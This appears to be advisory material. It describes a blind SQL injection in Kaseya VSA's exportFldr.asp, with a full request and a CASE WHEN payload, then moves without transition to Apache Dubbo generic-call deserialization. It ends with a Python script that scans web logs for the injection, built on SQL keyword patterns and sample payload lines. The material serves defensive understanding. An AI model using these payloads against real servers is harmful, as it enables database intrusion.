Detailed description

Given the following request:

```
GET /InstallTab/exportFldr.asp?fldrId=1' HTTP/1.1
Host: 192.168.1.194
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Cookie: ASPSESSIONIDCQACCQCA=MHBOFJHBCIPCJBFKEPEHEDMA; sessionId=30548861; agentguid=840997037507813; vsaUser=scopeId=3&roleId=2; webWindowId=59091519
```

where the sessionId cookie value has been obtained via CVE-2021-30116. The API call /InstallTab/exportFldr.asp is vulnerable to a semi-authenticated boolean-based blind SQL injection in the parameter fldrId.

Response:

```
HTTP/1.1 500 Internal Server Error
Cache-Control: private
Content-Type: text/html; Charset=Utf-8
Date: Thu, 19:12:11 GMT
Strict-Transport-Security: max-age=63072000; includeSubDomains
Connection: close
Content-Length: 881

Whoops.
-SNIP-
```

However, when fldrId is set to '(SELECT (CASE WHEN (1=1) THEN 1 ELSE (SELECT 1 UNION SELECT 2) END))' the request is allowed.

Apache Dubbo prior to 2.6.9 and 2.7.9 by default supports generic calls to arbitrary methods exposed by provider interfaces. These invocations are handled by the GenericFilter, which will find the service and method specified in the first arguments of the invocation and use the Java Reflection API to make the final call. The signature for the $invoke or $invokeAsync methods is Ljava/lang/String;[Ljava/lang/String;[Ljava/lang/Object; where the first argument is the name of the method to invoke, the second one is an array with the parameter types for the method being invoked and the third one is an array with the actual call arguments. In addition, the caller also needs to set an RPC attachment specifying that the call is a generic call and how to decode the arguments. The possible values are:

- true
- raw.return
- nativejava
- bean
- protobuf-json

An attacker can control this RPC attachment and set it to nativejava to force the Java deserialization of the byte array located in the third argument.
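As an added example, not part of either advisory, the following Python script shows how a defender can spot the exportFldr.asp injection described above in web-server logs: it flags requests whose fldrId is not a plain numeric identifier and reports clients that produced the error/success contrast a boolean-based blind probe depends on. The log line format, client addresses and timestamps are constructed for the demonstration and are not from the advisory.

```python
import re
from urllib.parse import parse_qs

# Constructed sample log lines (not from the advisory): time, client, method, path, query, status.
# Line 2 is the quote probe from the advisory, line 3 its CASE WHEN payload.
SAMPLE_LOG = """\
2021-07-08T19:12:01 10.0.0.5 GET /InstallTab/exportFldr.asp fldrId=1 200
2021-07-08T19:12:11 10.0.0.5 GET /InstallTab/exportFldr.asp fldrId=1%27 500
2021-07-08T19:12:30 10.0.0.5 GET /InstallTab/exportFldr.asp fldrId=(SELECT+(CASE+WHEN+(1%3D1)+THEN+1+ELSE+(SELECT+1+UNION+SELECT+2)+END)) 200
2021-07-08T19:13:02 10.0.0.9 GET /InstallTab/exportFldr.asp fldrId=42 200
"""

VULNERABLE_PATH = "/installtab/exportfldr.asp"
NUMERIC = re.compile(r"\d+")
# Keywords characteristic of the boolean-based blind payload quoted in the advisory.
SQL_TOKENS = re.compile(r"\b(SELECT|CASE|WHEN|UNION)\b", re.IGNORECASE)

def classify_fldr_id(value):
    """fldrId is a folder identifier, so a well-formed value is purely numeric."""
    if NUMERIC.fullmatch(value):
        return "ok"
    if SQL_TOKENS.search(value):
        return "sqli"
    if "'" in value:
        return "quote-probe"
    return "malformed"

def parse_line(line):
    ts, client, method, path, query, status = line.split()
    # parse_qs percent-decodes and turns '+' into spaces, so values are compared decoded.
    return {"ts": ts, "client": client, "path": path,
            "params": parse_qs(query, keep_blank_values=True), "status": int(status)}

def find_suspicious(log_text):
    """Return (ts, client, verdict, decoded_value, status) for every non-numeric fldrId."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec["path"].lower() != VULNERABLE_PATH:
            continue
        for value in rec["params"].get("fldrId", []):
            verdict = classify_fldr_id(value)
            if verdict != "ok":
                findings.append((rec["ts"], rec["client"], verdict, value, rec["status"]))
    return findings

def clients_with_blind_pattern(findings):
    """Clients that caused a server error with a probe and later had a SQL-laden value
    accepted (HTTP 200): that 500-vs-200 contrast is the oracle a blind probe reads."""
    seen = {}
    for _, client, verdict, _, status in findings:
        seen.setdefault(client, set()).add((verdict, status))
    return sorted(c for c, s in seen.items()
                  if any(v in ("quote-probe", "sqli") and st >= 500 for v, st in s)
                  and any(v == "sqli" and st == 200 for v, st in s))

if __name__ == "__main__":
    for finding in find_suspicious(SAMPLE_LOG):
        print(*finding)
    print("blind-probe clients:", clients_with_blind_pattern(find_suspicious(SAMPLE_LOG)))
```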